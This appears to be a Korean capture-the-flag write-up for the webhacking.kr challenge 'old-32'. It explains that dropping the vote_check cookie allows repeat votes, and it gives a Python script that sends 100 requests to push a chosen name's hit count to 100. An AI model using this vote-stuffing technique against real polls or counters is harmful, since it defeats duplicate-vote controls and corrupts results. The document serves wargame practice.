old-32

화면 보고 뭐지 싶지만 그냥 hit이 100이 되면 풀 수 있는 문제 같다.

내 이름이 100이 되어야 한다.

내 이름 보면 한 번 클릭하고 나서 이후에 editthiscookie로 보면 vote_check cookie가 생긴다. 그리고 다시 내 이름 클릭하면 이미 투표했다고 나온다. 이걸 지워주고 다시 투표를 하면 쭉 올릴 수 있는데 이 작업 100번 할거면 코딩 접어야 된다.

PHPSESSID를 쿠키에 입력시켜주고 vote_check를 무시하면서 hit=닉네임 파라미터를 넣어주는 걸 100회 반복하는 코드를 단순하게 짜면 된다.

import requests

def vote(payload):
    data = {"PHPSESSID": "your_PHPSESSID"} #vote_check 없이 짜면, 그냥 vote_check 무시함.
    res = requests.get("https://webhacking.kr/challenge/code-5/"+payload, cookies=data)
    
    for i in range(0, 100):
        res = requests.get("https://webhacking.kr/challenge/code-5/"+payload, cookies=data)
    if "Pwned" in res.text:
        print("Pwned") #아마 Pwned 가 아니라서 안뜰거임

if __name__ == "__main__":
    payload = "?hit=your_ID"
    vote(payload)

코드 실행하고 좀 있다가 F5 해주면 solve 된다.